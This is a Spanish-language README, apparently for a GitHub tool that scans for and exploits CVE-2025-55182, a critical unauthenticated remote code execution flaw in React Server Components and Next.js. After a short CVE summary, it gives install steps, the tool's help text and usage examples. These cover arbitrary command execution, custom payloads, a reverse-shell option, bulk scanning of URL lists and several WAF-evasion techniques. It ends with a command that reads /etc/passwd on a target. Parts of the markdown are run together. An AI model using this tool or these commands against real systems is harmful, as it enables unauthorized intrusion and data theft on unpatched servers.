
CVE-2025-55182 vulnerabilidad RCE en servidores Next.js/React RSC (exploit y scanner)
Esta herramienta está diseñada para investigadores de seguridad y testers de penetración para detectar y explotar la vulnerabilidad CVE-2025-55182 en aplicaciones Next.js/React RSC. Proporciona múltiples modos de escaneo, funcionalidades de explotación y técnicas de bypass de WAF.
rce, safe y vercel_bypass.| Categoría | Información |
|---|---|
| Publicada | 2025-12-03 |
| Puntuación Base | 10.0 (CRÍTICA) |
| Investigador | Lachlan Davidson (https://github.com/lachlan2k) |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Descripción | Una vulnerabilidad crítica de Ejecución Remota de Código (RCE) en React Server Components. Las aplicaciones que utilizan el runtime del lado servidor de React, incluidos frameworks como Next.js, están afectadas. El problema es causado por una deserialización insegura de datos del protocolo “Flight” no confiables, lo que permite a un atacante lograr la ejecución de código sin autenticación en el servidor. Se requiere actualizar a las versiones corregidas de React y del framework. |
| Puntuación EPSS | 27.81% (Probabilidad de explotación) |
| Catálogo CISA KEV | Listado: Sí, Ransomware: Desconocido |
| HackerOne Hacktivity | Ranking: 1, Informes: 92 |
| Prioridad de Parcheo | A+ |
Esta vulnerabilidad afecta las siguientes versiones de React Server Components:
Los siguientes paquetes también están afectados:
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpackgit clone https://github.com/l0n3m4n/CVE-2025-55182.git cd CVE-2025-55182
python3 -m venv venv-55182 source venv-55182/bin/activate
pip install -r requirements.txt
## uso```bash
❯ python3 CVE-2025-55182.py -h
__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\_____ \ / _____/| |__ ____ | | | |
| _// __ \\__ \ _/ ___\ __\/ ____/ \_____ \ | | \_/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___/| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
usage: CVE-2025-55182.py [-h] (-u URL | -f FILE) [-c COMMAND] [-p PAYLOAD] [-r LHOST:LPORT] [-sm MODE]
[-wb] [-wbs KB] [-wbu] [-o FILE] [-t NUM] [-T SEC] [-P URL] [-H HEADER] [-v]
Powerful all-in-one tool (scan and exploit) CVE-2025-55182 in Next.js applications
options:
-h, --help show this help message and exit
-u, --url URL Single URL to scan or exploit.
-f, --file FILE File containing a list of URLs to scan/exploit.
Exploitation Options:
-c, --command COMMAND Command to execute on the target(s).
-p, --payloads PAYLOAD Custom payload to execute on the target(s). Can be a string or a
file path.
-r, --reverse-shell LHOST:LPORT Attempt a reverse shell.
Scanning Options:
-sm, --scan-mode MODE Scanning technique. Choices: {rce, safe, vercel_bypass}. (default:
rce)
-wb, --waf-bypass Add junk data to the request to bypass WAFs.
-wbs, --waf-bypass-size KB Size of junk data in KB (default: 128).
-wbu, --waf-bypass-utf16le Use UTF-16LE encoding to bypass WAFs.
General Options:
-o, --output FILE File to save vulnerable URLs from scans.
-t, --threads NUM Number of concurrent threads (default: 10).
-T, --timeout SEC Request timeout in seconds (default: 10).
-P, --proxy URL Proxy to use (e.g., http://127.0.0.1:8080).
-H, --header HEADER Add custom headers (e.g., 'Cookie: session=...').
-v, --verbose Enable verbose output for success/failed/non-vulnerable checks.
rce (predeterminado): Modo de escaneo activo, ejecuta un comando echo para confirmar la vulnerabilidad. Este es el método más fiable, pero puede dejar registros en el sistema objetivo.safe: Modo de escaneo de canal lateral, no ejecuta comandos. Comprueba un mensaje de error específico (E{"digest") para determinar si el objetivo es vulnerable. Esto es más seguro que el modo rce, pero puede ser menos fiable.vercel_bypass: Utiliza un payload específico para eludir el WAF de Vercel y verifica la salida del comando en la cabecera X-Action-Redirect.crédito @coffinxp7
python3 CVE-2025-55182.py -u http://target.com
safe mode and 20 threadspython3 CVE-2025-55182.py -f urls.txt -sm safe -t 20
python3 CVE-2025-55182.py -f urls.txt -sm vercel_bypass -o vulnerable.txt
### Explotación```bash
# Execute a command on a single target
python3 CVE-2025-55182.py -u http://target.com -c "cat /etc/passwd"